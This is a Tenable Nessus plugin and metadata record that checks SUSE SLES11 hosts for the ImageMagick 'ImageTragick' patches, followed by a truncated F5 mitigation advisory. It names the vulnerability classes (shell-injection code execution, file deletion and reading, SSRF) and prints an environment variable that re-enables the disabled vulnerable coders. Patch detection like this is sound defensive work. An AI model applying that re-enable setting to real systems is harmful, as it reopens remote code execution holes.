ID SUSE_SU-2016-1275-1.NASL Type nessus Reporter This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2016-05-13T00:00:00
Description
This update for ImageMagick fixes the following issues :
Security issues fixed :
Several coders were vulnerable to remote code execution
attacks, these coders have now been disabled. They can
be re-enabled by exporting the following environment
variable
MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo
dules-Q16/coders/vu lnerable/ (bsc#978061)
CVE-2016-3715: Possible file deletion by using
ImageMagick's 'ephemeral' pseudo protocol which deletes
files after reading.
CVE-2016-3716: Possible file moving by using
ImageMagick's 'msl' pseudo protocol with any extension
in any folder.
CVE-2016-3717: Possible local file read by using
ImageMagick's 'label' pseudo protocol to get content of
the files from the server.
CVE-2016-3718: Possible Server Side Request Forgery
(SSRF) to make HTTP GET or FTP request.
Bugs fixed :
Use external svg loader (rsvg)
Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SUSE update advisory SUSE-SU-2016:1275-1.
# The text itself is copyright (C) SUSE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(91119);
script_version("2.16");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718");
script_name(english:"SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote SUSE host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"This update for ImageMagick fixes the following issues :
Security issues fixed :
- Several coders were vulnerable to remote code execution
attacks, these coders have now been disabled. They can
be re-enabled by exporting the following environment
variable
MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo
dules-Q16/coders/vu lnerable/ (bsc#978061)
- CVE-2016-3714: Insufficient shell characters filtering
leads to (potentially remote) code execution
- CVE-2016-3715: Possible file deletion by using
ImageMagick's 'ephemeral' pseudo protocol which deletes
files after reading.
- CVE-2016-3716: Possible file moving by using
ImageMagick's 'msl' pseudo protocol with any extension
in any folder.
- CVE-2016-3717: Possible local file read by using
ImageMagick's 'label' pseudo protocol to get content of
the files from the server.
- CVE-2016-3718: Possible Server Side Request Forgery
(SSRF) to make HTTP GET or FTP request.
Bugs fixed :
- Use external svg loader (rsvg)
Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.suse.com/show_bug.cgi?id=978061"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2016-3714/"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2016-3715/"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2016-3716/"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2016-3717/"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2016-3718/"
);
# https://www.suse.com/support/update/announcement/2016/suse-su-20161275-1/
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?7e254931"
);
script_set_attribute(
attribute:"solution",
value:
"To install this SUSE Security Update use YaST online_update.
Alternatively you can run the command listed for your product :
SUSE OpenStack Cloud 5 :
zypper in -t patch sleclo50sp3-ImageMagick-12549=1
SUSE Manager Proxy 2.1 :
zypper in -t patch slemap21-ImageMagick-12549=1
SUSE Manager 2.1 :
zypper in -t patch sleman21-ImageMagick-12549=1
SUSE Linux Enterprise Software Development Kit 11-SP4 :
zypper in -t patch sdksp4-ImageMagick-12549=1
SUSE Linux Enterprise Server 11-SP4 :
zypper in -t patch slessp4-ImageMagick-12549=1
SUSE Linux Enterprise Server 11-SP3-LTSS :
zypper in -t patch slessp3-ImageMagick-12549=1
SUSE Linux Enterprise Server 11-SP2-LTSS :
zypper in -t patch slessp2-ImageMagick-12549=1
SUSE Linux Enterprise Debuginfo 11-SP4 :
zypper in -t patch dbgsp4-ImageMagick-12549=1
SUSE Linux Enterprise Debuginfo 11-SP3 :
zypper in -t patch dbgsp3-ImageMagick-12549=1
SUSE Linux Enterprise Debuginfo 11-SP2 :
zypper in -t patch dbgsp2-ImageMagick-12549=1
To bring your system up-to-date, use 'zypper patch'."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libMagickCore1");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11");
script_set_attribute(attribute:"vuln_publication_date", value:"2016/05/05");
script_set_attribute(attribute:"patch_publication_date", value:"2016/05/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/13");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"SuSE Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE");
os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
os_ver = os_ver[1];
if (! preg(pattern:"^(SLES11)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLES11", "SUSE " + os_ver);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);
sp = get_kb_item("Host/SuSE/patchlevel");
if (isnull(sp)) sp = "0";
if (os_ver == "SLES11" && (! preg(pattern:"^(2|3|4)$", string:sp))) audit(AUDIT_OS_NOT, "SLES11 SP2/3/4", os_ver + " SP" + sp);
flag = 0;
if (rpm_check(release:"SLES11", sp:"4", cpu:"x86_64", reference:"libMagickCore1-32bit-6.4.3.6-7.34.1")) flag++;
if (rpm_check(release:"SLES11", sp:"4", cpu:"s390x", reference:"libMagickCore1-32bit-6.4.3.6-7.34.1")) flag++;
if (rpm_check(release:"SLES11", sp:"4", reference:"libMagickCore1-6.4.3.6-7.34.1")) flag++;
if (rpm_check(release:"SLES11", sp:"3", cpu:"x86_64", reference:"libMagickCore1-32bit-6.4.3.6-7.34.1")) flag++;
if (rpm_check(release:"SLES11", sp:"3", cpu:"s390x", reference:"libMagickCore1-32bit-6.4.3.6-7.34.1")) flag++;
if (rpm_check(release:"SLES11", sp:"3", reference:"libMagickCore1-6.4.3.6-7.34.1")) flag++;
if (rpm_check(release:"SLES11", sp:"2", cpu:"x86_64", reference:"libMagickCore1-32bit-6.4.3.6-7.34.1")) flag++;
if (rpm_check(release:"SLES11", sp:"2", cpu:"s390x", reference:"libMagickCore1-32bit-6.4.3.6-7.34.1")) flag++;
if (rpm_check(release:"SLES11", sp:"2", reference:"libMagickCore1-6.4.3.6-7.34.1")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ImageMagick");
}
{"id": "SUSE_SU-2016-1275-1.NASL", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled. They can\n be re-enabled by exporting the following environment\n variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo\n dules-Q16/coders/vu lnerable/ (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2016-05-13T00:00:00", "modified": "2016-05-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/91119", "reporter": "This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2016-3715/", "https://bugzilla.suse.com/show_bug.cgi?id=978061", "https://www.suse.com/security/cve/CVE-2016-3717/", "http://www.nessus.org/u?7e254931", "https://www.suse.com/security/cve/CVE-2016-3714/", "https://www.suse.com/security/cve/CVE-2016-3716/", "https://www.suse.com/security/cve/CVE-2016-3718/"], "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "type": "nessus", "lastseen": "2021-01-20T14:45:36", "edition": 27, "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K61974123", "F5:K03151140", "SOL29154575", "F5:K25102203", "SOL25102203", "F5:K10550253", "SOL10550253", "SOL03151140", "SOL61974123", "F5:K29154575"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310882484", "OPENVAS:1361412562310807568", "OPENVAS:1361412562310882483", "OPENVAS:1361412562311220161021", "OPENVAS:1361412562310851305", "OPENVAS:703580", "OPENVAS:1361412562310703580", "OPENVAS:1361412562310851307", "OPENVAS:1361412562310851304", "OPENVAS:1361412562310871609"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1261-1", "SUSE-SU-2016:1260-1", "SUSE-SU-2016:1301-1", "OPENSUSE-SU-2016:1266-1", "OPENSUSE-SU-2016:1326-1", "SUSE-SU-2016:1275-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-484-1:5CC12", "DEBIAN:DLA-1401-1:A41C0", "DEBIAN:DLA-486-1:42FF7", "DEBIAN:DSA-3580-1:70B04", "DEBIAN:DSA-3746-1:A9B4D"]}, {"type": "freebsd", "idList": ["0D724B05-687F-4527-9C03-AF34D3B094EC"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-1237", "ELSA-2016-0726"]}, {"type": "seebug", "idList": ["SSV:91446", "SSV:91463"]}, {"type": "exploitdb", "idList": ["EDB-ID:39791", "EDB-ID:39767"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E547A33BCC88CE840B8FDF179CDA0103"]}, {"type": "centos", "idList": ["CESA-2016:0726"]}, {"type": "redhat", "idList": ["RHSA-2016:0726"]}, {"type": "amazon", "idList": ["ALAS-2016-699"]}, {"type": "zdt", "idList": ["1337DAY-ID-25991"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2016-132-01.NASL", "SUSE_SU-2016-1260-1.NASL", "ORACLELINUX_ELSA-2016-0726.NASL", "REDHAT-RHSA-2016-0726.NASL", "DEBIAN_DLA-486.NASL", "FREEBSD_PKG_0D724B05687F45279C03AF34D3B094EC.NASL", "CENTOS_RHSA-2016-0726.NASL", "EULEROS_SA-2016-1021.NASL", "OPENSUSE-2016-569.NASL", "IMAGEMAGICK_7_0_1_1.NASL"]}, {"type": "slackware", "idList": ["SSA-2016-132-01"]}, {"type": "ubuntu", "idList": ["USN-2990-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:129B6A9BB5C74D717E5AB861B666605D"]}, {"type": "cve", "idList": ["CVE-2016-3715", "CVE-2016-3718", "CVE-2016-3717", "CVE-2016-3716", "CVE-2016-3714"]}, {"type": "gentoo", "idList": ["GLSA-201611-21"]}, {"type": "symantec", "idList": ["SMNTC-1408"]}, {"type": "cert", "idList": ["VU:250519"]}, {"type": "threatpost", "idList": ["THREATPOST:5A0AA7B5B7C5F0F1DCB3F0240A055C3F", "THREATPOST:0FADDF3632693BA6B864F1A3FB8D7EF9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136931"]}, {"type": "archlinux", "idList": ["ASA-201605-6"]}, {"type": "thn", "idList": ["THN:76D72EEDBF0F154F1633FE307178F974"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786777"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/FILEFORMAT/IMAGEMAGICK_DELEGATE"]}, {"type": "hackerone", "idList": ["H1:143966"]}], "modified": "2021-01-20T14:45:36", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2021-01-20T14:45:36", "rev": 2}, "vulnersScore": 8.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1275-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91119);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n\n script_name(english:\"SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled. They can\n be re-enabled by exporting the following environment\n variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo\n dules-Q16/coders/vu lnerable/ (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3714/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3715/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3716/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3717/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3718/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161275-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7e254931\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5 :\n\nzypper in -t patch sleclo50sp3-ImageMagick-12549=1\n\nSUSE Manager Proxy 2.1 :\n\nzypper in -t patch slemap21-ImageMagick-12549=1\n\nSUSE Manager 2.1 :\n\nzypper in -t patch sleman21-ImageMagick-12549=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS :\n\nzypper in -t patch slessp3-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2 :\n\nzypper in -t patch dbgsp2-ImageMagick-12549=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "91119", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:libMagickCore1"], "scheme": null, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}
{"f5": [{"lastseen": "2019-02-20T21:07:35", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "\nF5 Product Development has assigned ID 591908 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H29154575 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.1 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 5.0.0 \n4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol29154575\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **LABEL** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" />\n\nSince the vulnerable coder listed in CVE-2016-3717 is LABEL, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "edition": 1, "modified": "2017-08-24T00:50:00", "published": "2016-05-14T02:43:00", "id": "F5:K29154575", "href": "https://support.f5.com/csp/article/K29154575", "title": 